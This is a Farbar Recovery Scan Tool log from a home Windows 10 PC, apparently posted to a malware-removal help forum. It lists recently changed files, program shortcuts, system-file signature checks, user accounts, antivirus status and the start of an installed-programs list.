2016-10-19 15:04 - 2016-07-16 04:47 - 00000000 ___HD C:\Program Files\WindowsApps

2016-10-19 15:04 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\AppReadiness

2016-10-19 15:04 - 2014-11-01 19:56 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Packages

2016-10-19 06:56 - 2015-07-19 18:37 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Audacity

2016-10-19 05:01 - 2016-09-16 04:16 - 00000000 ____D C:\Users\Kyle Aniel

2016-10-18 23:55 - 2016-07-16 04:45 - 00000000 ____D C:\WINDOWS\INF

2016-10-18 23:53 - 2015-12-25 22:04 - 1317578402 _____ C:\WINDOWS\MEMORY.DMP

2016-10-18 20:55 - 2015-11-30 04:58 - 01824812 _____ C:\WINDOWS\system32\PerfStringBackup.INI

2016-10-18 20:47 - 2016-07-15 23:04 - 01048576 _____ C:\WINDOWS\system32\config\BBI

2016-10-18 20:26 - 2015-10-05 15:21 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

2016-10-18 19:51 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\addins

2016-10-18 19:40 - 2016-09-18 07:21 - 00002222 _____ C:\Users\Public\Desktop\Google Earth.lnk

2016-10-18 19:40 - 2016-09-16 04:35 - 00001564 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk

2016-10-18 19:40 - 2016-09-10 16:54 - 00002236 _____ C:\Users\Public\Desktop\Style Builder 2016.lnk

2016-10-18 19:40 - 2016-09-10 16:54 - 00002150 _____ C:\Users\Public\Desktop\LayOut 2016.lnk

2016-10-18 19:40 - 2016-09-10 16:54 - 00002061 _____ C:\Users\Public\Desktop\SketchUp 2016.lnk

2016-10-18 19:40 - 2016-09-04 15:17 - 00001310 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk

2016-10-18 19:40 - 2016-09-04 15:13 - 00001416 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Character Animator (Preview).lnk

2016-10-18 19:40 - 2016-09-04 14:16 - 00001610 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Application Manager.lnk

2016-10-18 19:40 - 2016-09-04 14:16 - 00001604 _____ C:\Users\Public\Desktop\Adobe Application Manager.lnk

2016-10-18 19:40 - 2016-08-04 19:11 - 00002653 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditVoicepack X.lnk

2016-10-18 19:40 - 2016-07-29 22:39 - 00000978 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk

2016-10-18 19:40 - 2016-07-12 12:13 - 00002507 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk

2016-10-18 19:40 - 2016-07-12 12:13 - 00002501 _____ C:\Users\Public\Desktop\Safari.lnk

2016-10-18 19:40 - 2016-06-08 08:09 - 00000957 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\paint.net.lnk

2016-10-18 19:40 - 2016-06-08 08:09 - 00000951 _____ C:\Users\Public\Desktop\paint.net.lnk

2016-10-18 19:40 - 2016-05-07 07:07 - 00001045 _____ C:\Users\Public\Desktop\WinRAR.lnk

2016-10-18 19:40 - 2016-05-06 20:00 - 00001092 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenShot Video Editor.lnk

2016-10-18 19:40 - 2016-04-07 19:48 - 00001823 _____ C:\Users\Public\Desktop\iTunes.lnk

2016-10-18 19:40 - 2016-03-11 22:17 - 00002615 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SBACSecureBrowser.lnk

2016-10-18 19:40 - 2016-03-11 22:17 - 00002609 _____ C:\Users\Public\Desktop\SBACSecureBrowser.lnk

2016-10-18 19:40 - 2016-02-13 07:26 - 00001223 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk

2016-10-18 19:40 - 2016-02-13 07:26 - 00001217 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk

2016-10-18 19:40 - 2015-12-29 13:47 - 00002267 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2016-10-18 19:40 - 2015-12-29 13:47 - 00002261 _____ C:\Users\Public\Desktop\Google Chrome.lnk

2016-10-18 19:40 - 2015-12-28 22:04 - 00001083 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk

2016-10-18 19:40 - 2015-12-28 22:04 - 00001077 _____ C:\Users\Public\Desktop\Audacity.lnk

2016-10-18 19:40 - 2015-12-09 20:31 - 00000908 _____ C:\Users\Public\Desktop\CCleaner.lnk

2016-10-18 19:40 - 2015-12-06 16:24 - 00001977 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Synthesia.lnk

2016-10-18 19:40 - 2015-12-06 16:24 - 00001971 _____ C:\Users\Public\Desktop\Synthesia.lnk

2016-10-18 19:40 - 2015-11-21 10:00 - 00002607 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CASecureBrowser.lnk

2016-10-18 19:40 - 2015-10-24 17:16 - 00002488 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk

2016-10-18 19:40 - 2015-10-24 17:16 - 00002487 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk

2016-10-18 19:40 - 2015-10-24 17:16 - 00002450 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk

2016-10-18 19:40 - 2015-10-24 17:16 - 00002430 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk

2016-10-18 19:40 - 2015-09-21 13:38 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

2016-10-18 19:40 - 2015-09-21 13:38 - 00002125 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk

2016-10-18 19:40 - 2015-07-24 07:52 - 00001869 _____ C:\Users\Public\Desktop\McAfee Security Center.lnk

2016-10-18 19:40 - 2015-02-18 01:10 - 00001098 _____ C:\Users\Public\Desktop\Vz  In-Home Agent.lnk

2016-10-18 19:40 - 2015-02-01 21:00 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk

2016-10-18 19:40 - 2014-11-01 17:50 - 00002497 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Messenger.lnk

2016-10-18 19:40 - 2014-11-01 17:50 - 00001469 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Mail.lnk

2016-10-18 19:40 - 2014-11-01 17:50 - 00001385 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk

2016-10-18 19:40 - 2014-11-01 17:50 - 00001316 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk

2016-10-18 19:38 - 2016-09-02 21:36 - 00001164 _____ C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IcoFX 2.lnk

2016-10-18 19:38 - 2016-08-22 18:30 - 00001107 _____ C:\Users\banie_000\Desktop\MidiEditor.lnk

2016-10-18 19:38 - 2016-08-13 15:12 - 00002196 _____ C:\Users\banie_000\Desktop\Wirecast.lnk

2016-10-18 19:38 - 2016-08-05 10:52 - 00001326 _____ C:\Users\banie_000\Desktop\Voice Changer 9.0 Diamond.lnk

2016-10-18 19:38 - 2016-07-29 23:31 - 00001933 _____ C:\Users\banie_000\Desktop\ADE 170.lnk

2016-10-18 19:38 - 2016-07-20 12:20 - 00002056 _____ C:\Users\banie_000\Desktop\767-300 FSX Configuration Manager.lnk

2016-10-18 19:38 - 2016-07-05 19:10 - 00001011 _____ C:\Users\banie_000\Desktop\Open Broadcaster Software.lnk

2016-10-18 19:38 - 2016-06-08 08:03 - 00001985 _____ C:\Users\banie_000\Desktop\DXTBmp.lnk

2016-10-18 19:38 - 2015-11-13 21:32 - 00001291 _____ C:\Users\banie_000\Desktop\video-editor_setup_full1107(1).exe.lnk

2016-10-18 19:38 - 2015-11-13 20:43 - 00001301 _____ C:\Users\banie_000\Desktop\video-editor-idco_setup_full1107.exe.lnk

2016-10-18 19:38 - 2015-11-13 20:00 - 00001276 _____ C:\Users\banie_000\Desktop\video-editor_setup_full1107.exe.lnk

2016-10-18 19:38 - 2015-08-29 09:54 - 00002391 _____ C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

2016-10-18 18:35 - 2016-08-16 13:16 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Flight Simulator X Files

2016-10-18 18:35 - 2016-08-04 21:03 - 00000000 ____D C:\Program Files (x86)\FS Recorder for FSX

2016-10-17 17:29 - 2016-04-05 18:54 - 00000000 ____D C:\ProgramData\BlueStacksSetup

2016-10-17 15:23 - 2016-07-16 04:36 - 00000000 ____D C:\WINDOWS\CbsTemp

2016-10-16 22:25 - 2016-09-04 15:19 - 00001531 _____ C:\Users\Kyle Aniel\Desktop\AfterFX.exe - Shortcut.lnk

2016-10-16 22:25 - 2016-08-28 12:55 - 00002885 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Flight Simulator X.lnk

2016-10-16 22:25 - 2016-07-15 20:52 - 00001164 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Expression Encoder 4.lnk

2016-10-16 22:25 - 2016-07-15 20:51 - 00001201 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Expression Encoder 4 Screen Capture.lnk

2016-10-16 22:25 - 2016-07-05 10:26 - 00001255 _____ C:\Users\Kyle Aniel\Desktop\HitFilm 4 Express.lnk

2016-10-16 22:25 - 2016-03-15 16:32 - 00001521 _____ C:\Users\Kyle Aniel\Desktop\DVDMaker.lnk

2016-10-16 22:25 - 2015-12-09 20:39 - 00001892 _____ C:\Users\Kyle Aniel\Desktop\PowerPoint 2016.lnk

2016-10-16 22:25 - 2015-12-09 20:39 - 00001877 _____ C:\Users\Kyle Aniel\Desktop\Word 2016.lnk

2016-10-16 16:58 - 2016-07-16 04:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft

2016-10-16 16:57 - 2014-07-16 23:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Office

2016-10-16 06:22 - 2014-12-07 21:10 - 00000364 _____ C:\WINDOWS\Tasks\HPCeeScheduleForKYLE-PC$.job

2016-10-15 20:10 - 2016-09-16 04:53 - 00003284 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForKYLE-PC$

2016-10-15 19:02 - 2015-05-01 14:58 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Screencast-O-Matic

2016-10-15 17:03 - 2014-12-22 16:56 - 00000000 ____D C:\Users\Kyle Aniel\.VirtualBox

2016-10-15 17:01 - 2015-01-10 11:00 - 00000000 ____D C:\Users\Kyle Aniel\VirtualBox VMs

2016-10-15 08:13 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\rescache

2016-10-14 23:19 - 2016-02-03 21:37 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Kyle Laptop 2-3-16

2016-10-14 21:22 - 2016-07-15 23:04 - 00008192 _____ C:\WINDOWS\system32\config\ELAM

2016-10-14 19:06 - 2014-11-01 19:52 - 00000000 __RHD C:\Users\Public\AccountPictures

2016-10-14 19:03 - 2016-09-16 04:09 - 04981224 _____ C:\WINDOWS\system32\FNTCACHE.DAT

2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs

2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel

2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns

2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\migwiz

2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\ShellExperiences

2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer

2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer

2016-10-13 21:06 - 2016-02-09 18:34 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Sound recordings

2016-10-13 17:02 - 2016-07-29 22:40 - 00000000 ____D C:\Users\Kyle Aniel\.gimp-2.8

2016-10-13 16:53 - 2015-12-24 21:16 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons

2016-10-13 15:53 - 2014-11-06 00:12 - 00000000 ____D C:\WINDOWS\system32\MRT

2016-10-13 15:40 - 2014-11-06 00:12 - 143495576 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

2016-10-13 15:07 - 2016-07-16 04:43 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll

2016-10-13 15:07 - 2016-07-16 04:42 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll

2016-10-13 15:00 - 2016-09-16 04:53 - 00004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task

2016-10-13 14:47 - 2014-11-02 17:45 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job

2016-10-11 21:24 - 2016-02-09 17:13 - 00000000 ____D C:\Users\Kyle Aniel\Documents\MultitrackStudio Songs

2016-10-11 19:55 - 2016-09-16 04:53 - 00003816 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater

2016-10-11 19:55 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed

2016-10-11 19:55 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\Macromed

2016-10-09 22:12 - 2016-07-29 22:43 - 00000000 ____D C:\Users\Kyle Aniel\.thumbnails

2016-10-07 21:33 - 2016-07-16 04:43 - 00471040 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe

2016-10-07 21:33 - 2016-07-16 04:43 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe

2016-10-07 21:33 - 2016-07-16 04:43 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe

2016-10-07 21:33 - 2016-07-16 04:43 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll

2016-10-07 21:33 - 2016-07-16 04:43 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll

2016-10-05 18:12 - 2016-07-16 04:47 - 00000000 __RHD C:\Users\Public\Libraries

2016-10-05 17:59 - 2016-04-05 18:57 - 00000000 ____D C:\Users\banie_000\AppData\Local\BlueStacks

2016-10-04 19:44 - 2016-09-16 05:08 - 00000000 ___DC C:\WINDOWS\Panther

2016-10-04 19:44 - 2016-09-16 05:02 - 00032216 _____ C:\WINDOWS\diagwrn.xml

2016-10-04 19:44 - 2016-09-16 05:02 - 00026570 _____ C:\WINDOWS\diagerr.xml

2016-10-03 19:51 - 2014-11-01 15:59 - 00000000 ____D C:\Program Files (x86)\Google

2016-10-03 13:09 - 2016-07-16 04:49 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe

2016-10-03 13:09 - 2016-07-16 04:49 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl

2016-10-02 20:57 - 2016-06-08 08:09 - 00000000 ___DC C:\Program Files\Staging

2016-10-01 15:44 - 2016-08-02 17:23 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\EZCA

2016-10-01 12:48 - 2016-08-21 20:28 - 00000000 ____D C:\Program Files (x86)\EZCA

2016-10-01 07:59 - 2016-08-13 17:40 - 00000000 ____D C:\ProgramData\Esellerate

2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12

2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\system32\F12

2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup

2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\setup

2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\oobe

2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\appraiser

2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\Provisioning

2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\bcastdvr

2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism

2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep

2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\system32\Dism

2016-09-24 17:41 - 2016-08-02 17:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EZCA

2016-09-22 21:17 - 2016-09-16 04:53 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software

 

==================== Files in the root of some directories =======

 

2005-11-27 00:53 - 2005-11-27 00:53 - 0049152 _____ ( ) C:\Program Files\Interop.WIA.dll

2013-08-25 18:57 - 2013-08-25 18:57 - 0001968 _____ () C:\Program Files\License.txt

2016-09-12 14:54 - 2016-09-12 14:54 - 1703120 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Base.dll

2016-09-12 14:54 - 2016-09-12 14:54 - 3425792 ____C () C:\Program Files\PaintDotNet.Base.pdb

2016-09-12 14:55 - 2016-09-12 14:55 - 0638160 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Core.dll

2016-09-12 14:55 - 2016-09-12 14:55 - 2088448 ____C () C:\Program Files\PaintDotNet.Core.pdb

2016-09-12 14:55 - 2016-09-12 14:55 - 0086736 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Data.dll

2016-09-12 14:55 - 2016-09-12 14:55 - 0259584 ____C () C:\Program Files\PaintDotNet.Data.pdb

2016-09-12 14:55 - 2016-09-12 14:55 - 0191184 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Effects.dll

2016-09-12 14:55 - 2016-09-12 14:55 - 0488960 ____C () C:\Program Files\PaintDotNet.Effects.pdb

2016-09-12 14:55 - 2016-09-12 14:55 - 1764560 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.exe

2016-06-28 11:34 - 2016-06-28 11:34 - 0000534 _____ () C:\Program Files\PaintDotNet.exe.config

2016-09-12 14:55 - 2016-09-12 14:55 - 0333520 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Framework.dll

2016-09-12 14:55 - 2016-09-12 14:55 - 1152512 ____C () C:\Program Files\PaintDotNet.Framework.pdb

2016-09-12 14:55 - 2016-09-12 14:55 - 4308480 ____C () C:\Program Files\PaintDotNet.pdb

2016-09-12 14:55 - 2016-09-12 14:55 - 0414928 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Resources.dll

2016-09-12 14:55 - 2016-09-12 14:55 - 0048640 ____C () C:\Program Files\PaintDotNet.Resources.pdb

2016-09-03 11:06 - 2016-09-03 11:06 - 0146082 ____R () C:\Program Files\PaintDotNet.Strings.3.cs.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0141848 ____R () C:\Program Files\PaintDotNet.Strings.3.da.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0147862 ____R () C:\Program Files\PaintDotNet.Strings.3.DE.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0147219 ____R () C:\Program Files\PaintDotNet.Strings.3.ES.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0158943 ____R () C:\Program Files\PaintDotNet.Strings.3.fa.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0140908 ____R () C:\Program Files\PaintDotNet.Strings.3.fi.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0149616 ____R () C:\Program Files\PaintDotNet.Strings.3.FR.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0189638 ____R () C:\Program Files\PaintDotNet.Strings.3.hi.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0146360 ____R () C:\Program Files\PaintDotNet.Strings.3.hu.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0145450 ____R () C:\Program Files\PaintDotNet.Strings.3.it.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0156109 ____R () C:\Program Files\PaintDotNet.Strings.3.JA.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0149217 ____R () C:\Program Files\PaintDotNet.Strings.3.KO.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0148057 ____R () C:\Program Files\PaintDotNet.Strings.3.lt.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0143678 ____R () C:\Program Files\PaintDotNet.Strings.3.nl.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0144619 ____R () C:\Program Files\PaintDotNet.Strings.3.pl.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0146572 ____R () C:\Program Files\PaintDotNet.Strings.3.PT-BR.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0146254 ____R () C:\Program Files\PaintDotNet.Strings.3.pt-PT.resources

2016-08-05 10:36 - 2016-08-05 10:36 - 0139694 ____R () C:\Program Files\PaintDotNet.Strings.3.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0172690 ____R () C:\Program Files\PaintDotNet.Strings.3.RU.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0143397 ____R () C:\Program Files\PaintDotNet.Strings.3.sv.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0136078 ____R () C:\Program Files\PaintDotNet.Strings.3.ZH-CN.resources

2016-09-03 11:06 - 2016-09-03 11:06 - 0138463 ____R () C:\Program Files\PaintDotNet.Strings.3.zh-TW.resources

2016-09-12 14:55 - 2016-09-12 14:55 - 0566480 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.SystemLayer.dll

2016-09-12 14:55 - 2016-09-12 14:55 - 1083600 _____ () C:\Program Files\PaintDotNet.SystemLayer.Native.x64.dll

2016-09-12 14:55 - 2016-09-12 14:55 - 0988368 _____ () C:\Program Files\PaintDotNet.SystemLayer.Native.x86.dll

2016-09-12 14:55 - 2016-09-12 14:55 - 0818688 ____C () C:\Program Files\PaintDotNet.SystemLayer.pdb

2016-09-12 14:54 - 2016-09-12 14:54 - 0014032 _____ (dotPDN LLC) C:\Program Files\PdnRepair.exe

2015-09-24 19:08 - 2015-09-24 19:08 - 0000235 _____ () C:\Program Files\PdnRepair.exe.config

2016-09-12 14:54 - 2016-09-12 14:54 - 0013824 ____C () C:\Program Files\PdnRepair.pdb

2016-09-12 14:55 - 2016-09-12 14:55 - 0029904 _____ (dotPDN LLC) C:\Program Files\SetupNgen.exe

2010-04-21 00:57 - 2010-04-21 00:57 - 0000254 _____ () C:\Program Files\SetupNgen.exe.config

2016-09-12 14:55 - 2016-09-12 14:55 - 0028160 ____C () C:\Program Files\SetupNgen.pdb

2016-09-12 14:54 - 2016-09-12 14:54 - 0105680 _____ () C:\Program Files\ShellExtension_x64.dll

2016-09-12 14:54 - 2016-09-12 14:54 - 0096976 _____ () C:\Program Files\ShellExtension_x86.dll

2016-09-12 14:54 - 2016-09-12 14:54 - 0015568 _____ (dotPDN LLC) C:\Program Files\UpdateMonitor.exe

2015-09-24 19:10 - 2015-09-24 19:10 - 0000235 _____ () C:\Program Files\UpdateMonitor.exe.config

2016-09-12 14:54 - 2016-09-12 14:54 - 0013824 ____C () C:\Program Files\UpdateMonitor.pdb

2015-07-16 22:46 - 2016-01-10 00:02 - 0007598 _____ () C:\Users\banie_000\AppData\Local\Resmon.ResmonCfg

2014-12-12 16:48 - 2014-12-12 16:48 - 0000057 _____ () C:\ProgramData\Ament.ini

2015-12-05 11:28 - 2015-12-05 11:28 - 0000016 _____ () C:\ProgramData\mntemp

2015-12-05 11:28 - 2015-12-05 11:28 - 0004133 _____ () C:\ProgramData\rxsmznjf.zcp

2016-02-06 15:35 - 2016-02-06 15:35 - 0004865 _____ () C:\ProgramData\smxrsjou.kmd

 

Files to move or delete:

====================

C:\Users\Kyle Aniel\fs9.exe

C:\Users\Kyle Aniel\MetricCollection.dll

 

 

==================== Bamital & volsnap ======================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\WINDOWS\system32\winlogon.exe => File is digitally signed

C:\WINDOWS\system32\wininit.exe => File is digitally signed

C:\WINDOWS\explorer.exe => File is digitally signed

C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed

C:\WINDOWS\system32\svchost.exe => File is digitally signed

C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed

C:\WINDOWS\system32\services.exe => File is digitally signed

C:\WINDOWS\system32\User32.dll => File is digitally signed

C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed

C:\WINDOWS\system32\userinit.exe => File is digitally signed

C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed

C:\WINDOWS\system32\rpcss.dll => File is digitally signed

C:\WINDOWS\system32\dnsapi.dll => File is digitally signed

C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed

C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2016-10-17 15:19

 

==================== End of FRST.txt ============================

Link to post
Share on other sites

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016

Ran by banie_000 (20-10-2016 15:02:31)

Running from C:\Users\Kyle Aniel\Downloads

Windows 10 Home Version 1607 (X64) (2016-09-16 12:11:12)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-23814709-2432651133-2868963390-500 - Administrator - Disabled)

banie_000 (S-1-5-21-23814709-2432651133-2868963390-1010 - Administrator - Enabled) => C:\Users\banie_000

DefaultAccount (S-1-5-21-23814709-2432651133-2868963390-503 - Limited - Disabled)

Guest (S-1-5-21-23814709-2432651133-2868963390-501 - Limited - Disabled) => C:\Users\Guest

Izach Aniel (S-1-5-21-23814709-2432651133-2868963390-1002 - Limited - Enabled) => C:\Users\Izach Aniel

Kyle Aniel (S-1-5-21-23814709-2432651133-2868963390-1001 - Limited - Enabled) => C:\Users\Kyle Aniel

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AV: Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}

FW: Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

µTorrent (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\uTorrent) (Version: 3.4.8.42501 - BitTorrent Inc.)

757 American Airlines (One World livery) v1.03 (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\757 American Airlines (One World livery) v1.03) (Version:  - )

757 American Airlines v1.01 (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\757 American Airlines v1.01) (Version:  - )

777 Captain (777-200) 1.1 (HKLM-x32\...\x772) (Version: 1.1.00 - © 1999-2013 Captain Sim)

